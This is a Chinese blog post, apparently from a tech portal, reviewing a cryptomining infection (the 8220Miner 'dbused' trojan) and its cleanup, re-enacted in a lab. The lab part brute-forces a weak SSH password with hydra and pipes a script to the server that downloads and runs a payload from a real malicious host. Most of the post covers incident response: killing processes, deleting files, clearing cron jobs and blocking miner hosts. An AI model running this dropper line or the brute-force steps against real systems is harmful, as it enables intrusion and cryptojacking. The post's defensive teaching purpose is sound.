您当前的位置:首页 > 电脑百科 > 安全防护 > 病毒

一次挖矿病毒的处理过程复盘

时间:2021-09-07 14:28:38  来源:  作者:walkingcloud
一次挖矿病毒的处理过程复盘

 

一、挖矿病毒的小科普

挖矿病毒可以说是安全圈的“老熟人”了,各类安全事件一直不乏它们活跃的身影。亚信安全发布的《2020年度安全威胁回顾及预测》显示:2020年,挖矿病毒持续活跃,不仅老病毒出现频繁更新,而且还出现了多个新型挖矿病毒。其中,有隐藏在linux设备的计划任务中,通过定时任务的方式下载并执行挖矿程序和“海啸”后门程序 ,发动DDoS攻击;还有WMI无文件挖矿实现双平台感染;伪装成系统文件的XMRDoor挖矿病毒;以及利用“新冠病毒”邮件传播的“LemonDuck”无文件挖矿病毒。

而进入2021年,针对发展中国家的挖矿病毒攻击更是呈上涨态势。究其原因,如印度、泰国等国家在网络安全方面投入成本较低,人员安全意识比较薄弱,挖矿病毒攻击成功概率较高。此外,制造业、政府、医疗、金融等行业依然是挖矿病毒的主要攻击目标

可以看一下这个科普小视频快速了解《什么是挖矿病毒》

视频来自:https://mp.weixin.qq.com/s/RuWx1KDvJSUby416KBnxmQ

2、本次中招的挖矿病毒为

http://bash.givemexyz.in/xms dbused木马

处理过程参考了如下连接

https://zhuanlan.zhihu.com/p/376610910

https://cloud.tencent.com/developer/article/1853002

三、挖矿木马清理复盘

为了复盘,我这里准备kali及测试服务器模拟挖矿病毒入侵及查杀清理的过程

本次中招的挖矿病毒为8220Miner挖矿病毒家族

病毒木马一般会利用高危漏洞和弱口令进行入侵

Kali 192.168.31.15

centos7.9 192.168.31.232

1、CentOS7服务器上存在弱口令系统账号admin

模拟弱口令用户admin

一次挖矿病毒的处理过程复盘

 

(图片可点击放大查看)

2、弱口令暴力破解

hydra工具暴力破解admin用户弱密码就是admin

一次挖矿病毒的处理过程复盘

 

(图片可点击放大查看)

 

3、Kali 机器上准备挖矿病毒

cat /opt/Miner_virus.sh                                                                                                                                                
#!/bin/bash
cd /home/admin;
(curl -fsSL http://bash.givemexyz.in/xms||wget -q -O- http://bash.givemexyz.in/xms||Python -c 'import urllib2 as fbi;print fbi.urlopen("http://bash.givemexyz.in/xms")
.read()')| bash -sh; lwp-download http://bash.givemexyz.in/xms /xms; bash /xms; /xms; rm -rf /xms

一次挖矿病毒的处理过程复盘

 

(图片可点击放大查看)

4、接下来进行攻击入侵

ssh admin@192.168.31.232 < /opt/Miner_virus.sh

输入弱口令admin

一次挖矿病毒的处理过程复盘

 

(图片可点击放大查看)

等待脚本执行

一次挖矿病毒的处理过程复盘

 

(图片可点击放大查看)

说明:当然挖矿病毒黑产团队的入侵手段肯定比我这种要高级太多

上面只是简单模拟

5、很快这台机器很快就中招了

CPU100%

一次挖矿病毒的处理过程复盘

 

(图片可点击放大查看)

可见弱口令被攻击的成本真的很低

6、接下进行应急响应查杀

ps -ef | grep dbused
ll /proc/17743/exe

可以看到/tmp目录下有不少恶意程序文件

cd /tmp
ls -al
一次挖矿病毒的处理过程复盘

 

(图片可点击放大查看)

7、先改掉弱密码,杀掉进程

passwd admin
kill -9 PID
一次挖矿病毒的处理过程复盘

 

(图片可点击放大查看)

8、删掉恶意程序文件

cd /tmp
ls -al
rm -rf bashirc dbused .lock .pwn .python
一次挖矿病毒的处理过程复盘

 

(图片可点击放大查看)

一次挖矿病毒的处理过程复盘

 

(图片可点击放大查看)

9、别太乐观

你以为就完事了,不,你错了, 人家也不是吃素的

隔一会top查看CPU又100%了

一次挖矿病毒的处理过程复盘

 

(图片可点击放大查看)

检查异常进程
ps -ef 

一次挖矿病毒的处理过程复盘

 

(图片可点击放大查看)

检查admin用户的crontab
su -admin 
crontab -l
一次挖矿病毒的处理过程复盘

 

(图片可点击放大查看)

ps -ef | grep admin

异常进程都是admin用户在运行

一次挖矿病毒的处理过程复盘

 

(图片可点击放大查看)

  • 再次杀异常进程
ps -ef | grep "dbused"| awk '{print $2}'| xargs kill
ps -ef | grep "bashirc"| awk '{print $2}'| xargs kill
ps -ef | grep admin | grep giveme | awk '{print $2}'| xargs kill
一次挖矿病毒的处理过程复盘

 

(图片可点击放大查看)

  • 删掉恶意程序文件
rm -rf bashirc dbused .lock .pwn .python
一次挖矿病毒的处理过程复盘

 

(图片可点击放大查看)

admin用户的定时任务清理

一次挖矿病毒的处理过程复盘

 

(图片可点击放大查看)

.bash_profile 文件清理

cat /home/admin/.bash_profile

一次挖矿病毒的处理过程复盘

 

(图片可点击放大查看)

10、也学习挖矿病毒的套路进行抑制

如果再观察top CPU还是100%的话 可能就要献上大招了

1)vi /etc/hosts 解析成不通的地址

一次挖矿病毒的处理过程复盘

 


一次挖矿病毒的处理过程复盘

 

(图片可点击放大查看)

2)定时任务杀进程并清理

脚本如下

/opt/virus_clear.sh
#!/bin/bash
LOCK=/var/log/virus_clear.log
echo "清理日期:" >> ${LOCK} 2>&1
echo `date '+%Y-%m-%d_%T'`  >> ${LOCK} 2>&1
echo "=================Virus Clear Start==============================="   >> ${LOCK} 2>&1
ps -ef | grep "dbused"| awk '{print $2}'| xargs kill >> ${LOCK} 2>&1
ps -ef | grep "bashirc"| awk '{print $2}'| xargs kill >> ${LOCK} 2>&1
ps -ef | grep admin | grep giveme | awk '{print $2}'| xargs kill >> ${LOCK} 2>&1
rm -rf /tmp/bashirc /tmp/dbused /tmp/.lock /tmp/.pwn /tmp/.python >> ${LOCK} 2>&1
echo > /var/spool/cron/admin >> ${LOCK} 2>&1

记得脚本添加执行权限

crontab -e

设置定时任务

一次挖矿病毒的处理过程复盘

 

(图片可点击放大查看)

这样为减少业务带来的影响,先恢复业务,为溯源和百度求证完全清理赢得时间

3)出口防火墙上封锁矿池IOC地址

4)移走/usr/bin/curl和/usr/bin/wget命令

一次挖矿病毒的处理过程复盘

 

(图片可点击放大查看)

前提是你的业务程序不需要使用到这两个命令

如果是root弱密码或其他漏洞进行bash提权进行入侵的话,清理难度就比我上面的要大

可以研究一下具体木马脚本里注入了哪些地方

一次挖矿病毒的处理过程复盘

 

(图片可点击放大查看)

一次挖矿病毒的处理过程复盘

 

(图片可点击放大查看)

一次挖矿病毒的处理过程复盘

 

(图片可点击放大查看)

四、总结

不过也遇到过kdevtmpfsi和startMiner新型变种挖矿木马,这种清理就相比上面复杂一些

可以参考如下文章进行处理

  • 《记一次套路较深的双家族挖矿事件应急响应》

https://www.freebuf.com/articles/network/280004.html

  • 《应急响应案例:kdevtmpfsi挖矿木马》

https://cloud.tencent.com/developer/article/1744547

  • 《从一次攻击溯源中暴露的安全问题》

https://cloud.tencent.com/developer/article/1796933

  • #挖矿木马

https://mp.weixin.qq.com/mp/Appmsgalbum?__biz=MzI5ODk3OTM1Ng==&action=getalbum&album_id=1886143538539593741&scene=173&from_msgid=2247499275&from_itemidx=1&count=3&nolastread=1#wechat_redirect

  • 《挖矿木马自助清理手册》

https://cloud.tencent.com/developer/article/1834731



Tags:挖矿病毒   点击:()  评论:()
声明:本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,如有任何标注错误或版权侵犯请与我们联系(Email:2595517585@qq.com),我们将及时更正、删除,谢谢。
▌相关推荐
一、挖矿病毒的小科普挖矿病毒可以说是安全圈的“老熟人”了,各类安全事件一直不乏它们活跃的身影。亚信安全发布的《2020年度安全威胁回顾及预测》显示:2020年,挖矿病毒持续...【详细内容】
2021-09-07  Tags: 挖矿病毒  点击:(384)  评论:(0)  加入收藏
0x0前言本病毒使用了去符号表、敏感信息混淆、int 0x80执行系调函数、sh -c 执行bash脚本获取相关信息等技术来做免杀处理。但是不足的点也很明显: top命令可以直接查看病...【详细内容】
2020-08-10  Tags: 挖矿病毒  点击:(118)  评论:(0)  加入收藏
上周一早上,我和磊哥正百无聊赖的在公司大门口抽烟,突然手机提示我们的xenapp服务器资源使用率过高。按理说,这服务器一个月的总访问量也不会超过100,资源不可能耗尽。初步估计...【详细内容】
2019-08-26  Tags: 挖矿病毒  点击:(1024)  评论:(0)  加入收藏
▌简易百科推荐
一、挖矿病毒的小科普挖矿病毒可以说是安全圈的“老熟人”了,各类安全事件一直不乏它们活跃的身影。亚信安全发布的《2020年度安全威胁回顾及预测》显示:2020年,挖矿病毒持续...【详细内容】
2021-09-07  walkingcloud    Tags:挖矿病毒   点击:(384)  评论:(0)  加入收藏
在系统运行时, 病毒通过病毒载体即系统的外存储器进入系统的内存储器, 常驻内存。该病毒在系统内存中监视系统的运行, 当它发现有攻击的目标存在并满足条件时,便从内存中将...【详细内容】
2021-08-30  Linf    Tags:计算机病毒   点击:(97)  评论:(0)  加入收藏
勒索病毒是一种计算机病毒,通过计算机漏洞、邮件投递、恶意木马程序、网页后门等方式进行传播。一旦感染,磁盘上几乎所有格式的文件都会被加密,造成企业和个人用户大量重要文...【详细内容】
2021-07-27    河南网警  Tags:勒索病毒   点击:(220)  评论:(0)  加入收藏
如果你是一名很早就开始上网冲浪的高手,那么对于2006年风靡一时的熊猫烧香一定不会陌生,与更早开始流行的灰鸽子不同,熊猫烧香是一款拥有自动传播、自动感染硬盘能力和强大的破...【详细内容】
2021-07-23    中关村在线  Tags:杀毒软件   点击:(170)  评论:(0)  加入收藏
大家好,不知道你们有没有意识到一个问题:现如今,计算机病毒似乎不像多年前那样令人头疼了。在十几年前,清理病毒简直就是计算机用户的家常便饭,尤其如打印店、网吧这种密集场所,你...【详细内容】
2021-06-01    中关村在线  Tags:中毒   点击:(143)  评论:(0)  加入收藏
最近在网上看到好多的用户被这个名叫Incaseformat的病毒侵袭电脑,导致电脑除了C盘以外的所有的磁盘都被格式化了。这让很多小伙伴遇到这个病毒的时候不知所措,不知道该如何去...【详细内容】
2021-01-22      Tags:Incaseformat   点击:(239)  评论:(0)  加入收藏
1 月 13 日晚,360、深信服等安全公司发布了紧急预警,称监测到蠕虫病毒 incaseformat 大范围爆发,已有多家公司发生磁盘数据被删事件。该蠕虫病毒主要通过 U 盘传播,感染用户机...【详细内容】
2021-01-15      Tags:蠕虫病毒   点击:(194)  评论:(0)  加入收藏
12月初,我们发现了一种新的用Golang编写的蠕虫。该蠕虫延续了 Golang在2020年流行的多平台恶意软件趋势。...【详细内容】
2021-01-05      Tags:蠕虫   点击:(174)  评论:(0)  加入收藏
勒索病毒事件愈来愈多 近期针对传统行业的勒索病毒攻击事件愈来愈多,甚至一天内会有多家同一行业的企业同时受到攻击,造成企业业务运营中断,个人和公司重要数据遭受破坏等严重...【详细内容】
2020-12-18      Tags:勒索病毒   点击:(186)  评论:(0)  加入收藏
随着信息化的发展,数据安全的重要性愈加突出。据最新的 Hiscox 全球网络安全统计,在勒索软件攻击事件当中,64%以上的用户是中小企业。因此,制定完善的灾备策略,是抵御网络威胁的...【详细内容】
2020-12-15      Tags:勒索者病毒   点击:(145)  评论:(0)  加入收藏
最新更新
栏目热门
栏目头条